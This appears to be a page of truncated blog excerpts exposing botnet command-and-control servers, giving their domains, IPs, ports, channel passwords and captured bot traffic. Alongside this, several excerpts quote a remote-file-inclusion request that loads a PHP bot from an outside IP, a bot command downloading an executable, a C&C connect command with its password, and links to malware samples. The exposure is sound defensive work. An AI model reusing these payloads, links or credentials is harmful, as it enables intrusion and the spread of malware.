nbot.no-ip.biz(Aryan Bot hosted in Mexico Television Internacional S.a. De C.v)

Resolved : [nbot.no-ip.biz] To [187.161.215.20] Remote Host Port Number 187.161.215.20 6667 Local users: Current Local Users: 74 Max: 115 Global users: Current Global Users: 74 Max: 90 JOIN #bots none NICK New{US-XP-x86}7358801 USER 7358801 “” “7358801” :7358801 MODE New{US-XP-x86}7358801 +iMm PONG :4D23E0D9 PONG :nbot.no-ip.biz Now talking in #bots Modes On: [ #bots 12] [ +

gigasphere.su(irc botnet hosted in United States Baltimore Gandi Us Inc)

Same hecker Burimi from here http://www.exposedbotnets.com/2012/03/217160224132irc-botnet-hosted-in.html Resolved : [gigasphere.su] To [61.31.99.67] Resolved : [gigasphere.su] To [82.165.135.196] Resolved : [gigasphere.su] To [173.246.102.122] Remote Host Port Number 61.31.99.67 4042 PASS ngrBot 61.31.99.67 1863 PASS ngrBot other ports used for ircd: 81,3333,1234,33333 NICK new[USA|XP|COMPUTERNAME]eejxdfy USER xd “” “lol” :xd Channels: Now talking in #boss Topic On: [ #boss

fasharlz.com(ngrBot hosted in United States Denver Wbs Connect)

Resolved : [fasharlz.com] To [8.33.7.91] Remote Host Port Number 174.140.174.50 80 199.15.234.7 80 62.149.142.23 80 8.33.7.91 8879 PASS secret NICK n{US|XPa}wjipllb USER wjipllb 0 0 :wjipllb JOIN #ircp secret PRIVMSG #ircp :[d=”http://www.lazynews.net/fashashogun.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataScxaxs.exe” – Download retries: 0 PRIVMSG #ircp :[DNS]: Blocked 0 domain(s) – Redirected 8 domain(s)

anonproducts.info(Loader hosted in Germany Frankfurt Leaseweb Germany Gmbh)

Another post from same guy here http://www.exposedbotnets.com/2012/04/webethugsinsomnia-bot-hosted-in.html Samples here: http://www.mediafire.com/?f25869md9bv3q9d password: virus Control Panel: Control Panel Url http://anonproducts.info/xx/ Loader.exe is a .net http bot, that connects to global-carding.ru/gate.php. Used for ddosing and loading malware (mainly RATS). Most files to be installed are loaded from webcamchat4free.in. Packet captures of it in action http://www.mediafire.com/?t8obhi8jttvh1l5 Credits to our

we.be.thu.gs(Insomnia bot hosted in Netherland Amsterdam Ecatel Ltd)

A guy posted in this thread http://www.exposedbotnets.com/2012/04/insomnia-irc-bot-v113-manual.html about another Insomnia botnet server u can read in comments for more Resolved : [we.be.thu.gs] To [80.82.79.21] Bv1’s insomnia bot server Server we.be.thu.gs ssl required to connect. use xchat or install it on mirc accept his invalid certificate Port 443 Password fuckyou To conect do this /server we.be.thu.gs:+443

INSOMNIA IRC Bot v1.1.3 Manual

Insomnia is another irc bot sold in hecking forums coded in .NET I m posting the manual here so u can see what it does INSOMNIA v1.1.3 Table of Contents 1. Summary 2. Core Features 3. Malware Removal 4. SOCKS5 5. DDoS 6. Spreading Modules 7. Topic Generator Explained 8. Complete command list Summary Insomnia

noaccess.chaoswow.net(NZM bots hosted in Germany Nuremberg Hetzner Online Ag)

Resolved : [noaccess.chaoswow.net] To [176.9.195.60] Remote Host Port Number noaccess.chaoswow.net 18967 NICK USA|00|XP|SP2|1884237 USER fhfrlaam 0 0 :USA|00|XP|SP2|1884237 USERHOST USA|00|XP|SP2|1884237 MODE USA|00|XP|SP2|1884237 -x+i JOIN ##&crackr0x#&## 1@$$smoqueed@@ NICK USA|00|XP|SP2|0441020 USER zfoxtlp 0 0 :USA|00|XP|SP2|0441020 USERHOST USA|00|XP|SP2|0441020 MODE USA|00|XP|SP2|0441020 -x+i NICK USA|00|XP|SP2|5607084 USER ucxoiuauh 0 0 :USA|00|XP|SP2|5607084 USERHOST USA|00|XP|SP2|5607084 MODE USA|00|XP|SP2|5607084 -x+i NICK USA|00|XP|SP2|5062754 USER oqqeofyr 0

fghfg.translate-google-cache.com(irc botnet hosted in Taiwan Taipei Taiwan Fixed Network Co. Ltd)

Remote Host Port Number fghfg.translate-google-cache.com 5900 other domains: tux.shannen.cc urcdw.zavoddebila.com NICK [USA][XP-SP2]669217 USER VirUs “” “lol” :My_Name_iS_PIG_and_Iam_A_GaY2742 JOIN ##Turb0-37## NICK [USA][XP-SP2]062388 USER VirUs “” “lol” :My_Name_iS_PIG_and_Iam_A_GaY7011 NICK {NOVA}[USA][XP-SP2]750366 USER VirUs “” “lol” :My_Name_iS_PIG_and_Iam_A_GaY0938 hosting infos: http://whois.domaintools.com/61.31.99.67

Irc.javairc.org(turkish noobs scaning for RFI)

i was looking for online users in my vbulletin site and i saw this : /threads//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://95.154.24.14:32000//accounts/inc/admin/apache.jpg i downloaded apache.jpg and i found that is a lame pBot directing to irc.javairc.org here http://95.154.24.14:32000//accounts/ i found the lamer behind all this :-=[ HackeD by PasteL ]=- here is the chanel used for rfi scan Now talking in